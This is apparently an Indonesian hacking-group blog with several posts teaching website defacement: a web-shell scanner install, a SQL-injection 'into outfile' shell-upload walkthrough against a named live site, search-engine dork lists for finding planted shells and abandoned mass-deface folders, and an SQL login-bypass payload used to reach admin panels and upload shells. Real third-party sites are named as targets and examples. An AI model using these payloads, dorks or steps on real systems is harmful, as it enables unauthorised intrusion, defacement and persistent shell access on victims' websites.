Postingan

scan shell di website

Gambar
Assalamu'alaikum gaes..
kali ini gw Umam paling ganteng di Ghost Riddiculous Team, mo share tools shell-scanner h3h3..
bagi yg suka scan" kuy lgs aja.

bahan:
- Termux, download di playstore ada

oke, lgs aja
gini printahna
$ pkg upgrade && pkg update
$ pkg install php
$ pkg install git
$ git clone https://github.com/umamgans/shell-scan
$ php xD.php

disitu kalian masukan sitena aja,
example : target.com

Thanks to all member Ghost Riddiculous Team

Cara Deface SQL-Injection Into Outfile

Gambar
yo whatsap gaes, btw Assalamu'alaikum.. :)
kenalin nama gw Umam paling ganteng di Ghost Riddiculous Team. Kali ini gw mo berbagi ilmu, cara deface SQL-Injection Into Outfile - Upload shell without admin panel.
langsung aja ga usah basa basi h3h3

persiapan:
1. Internet lah pastinya
2. Target gan, klo ga ada target mo ngapain? :v
3. Kopi + Asap 😎

life target : http://bernadyland.com

step satu byasalah ya cari error nya dulu dengan quote ' klo error brrti ya vuln. Lakukan order by 1000 --+- sprti gambar dibawah


disitu muncul error kek gini..
Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, boolean given in D:\xampp\htdocs\bernadyland\berita\lihatDetailBerita.php on line 4

nah, step kedua lakukan union select pada umumna lah.. klo uda nampilin angka togelna sprti gambar dibawah ini..


kyta lgs cek file_privnya saja gan, contoh;
http://target.com/index.php?id=-7 union select 1,2,file_priv,3,4 from mysql.user-- -

klo muncul huruf Y kek gambar dibawah, brrti wr…

Dorking Folder Mass Deface

Gambar
Yo Gayn Kali Ini Gue Mau Kasih Tau Tutorial Dorking Folder Mass Deface Gayn :'v005

Dork : intitle:Mass Deface By

Selebihnya Use Your Brain

Langsung Aja Dorking Di Search Engine :v

Tinggal Kalian Cari Deh Web Yg Masih Ada Folder Mass Defacenya/Yg Ditinggalkan Oleh Sang Kekasih ;'( Oke Disini Saya Dah Nemu Ea ;'v005

Just Tinggal Paste Sc Deface Kalian/Apa Lah I Don't Care :') Tinggal Klik Star Deh
Kalo Sukses/Berhasil Kek Gambar Dibawah Ini

Ea Gampang Kan :v005 Happy Dorking Say <3


Example : http://www.sorrelhoss.com

Thanks To All Member Ghost Riddiculous Team

Dork Dorking Shell

Gambar
Ok Kali Ini Gue Mau Share Dork Mata Batin Gayn Wowkowowk :'v00s

intitle:index of inurl:/images/ mini.php

intitle:index of intext:mini.php

intitle:index of inurl:/img/ mini.php

intitle:index of inurl:/images/ shell.php

intitle:index of intext:shell.php

intitle:index of inurl:/img/ shell.php

intitle:Mini Shell intext:/public_html/admin

intitle:5h3ll intext:/public_html/images/

intitle:Private intext:/public_html/images/

Selebihnya? Use Your Brain Ajg Lo
Thanks To All Member Ghost Riddiculous Team

Deface Bypass Sql Login

Gambar
Yo Guys Dah Lama Juga Gue G Nulis Artikel :'v Kali Ini W Mau Share Tutorial Deface Bypass Sql Login Langsung Aja Ajg

Dork :

intext:manager intitle:Admin Login

inurl:/adminpanel/ intitle:manager

inurl:/admin/ intitle:Admin Panel

Selebihnya Use Your Brain :'v

Langsung Aja Ya Kan Dorking di Google

Pilih Salah Satu Web/Target Ea :'v

Kalo Udah Kalian Bisa Login Dengan Menggunakan U/p :  ' or 1=1 limit 1 -- -+


Langsung Aja Klik Sign in/Login
Kalo Vuln Langsung Bisa Masuk Ke Dasboard Ea :v Kalo G Bisa? Ya Jgn Sedih Coba Aja Di Bypass Admin/Admin Weak Password Kali Aja Bisa Gayn


Ea Gue Dah Masuk Ke Dasboard Ea :'v
(+) W Dah Up Shell :'v
Cara Biar Tau Location Filenya?:'v Ya Tinggal Klik Aja Gambar Yang Rusak Terus Klik Open New Tab/Bisa Juga Lewat view-source



Tadaaaaa Ea Ajg :'v005 Seterah Kalian Dah Tuh Mo Ngapain Gw G Peduli :'v005


Example: http://www.lmcarchitects.com/-.php

Sangat Gampang Kan :'v Yang Susah Itu Ngelupain Kamu :')

Thanks To All Me…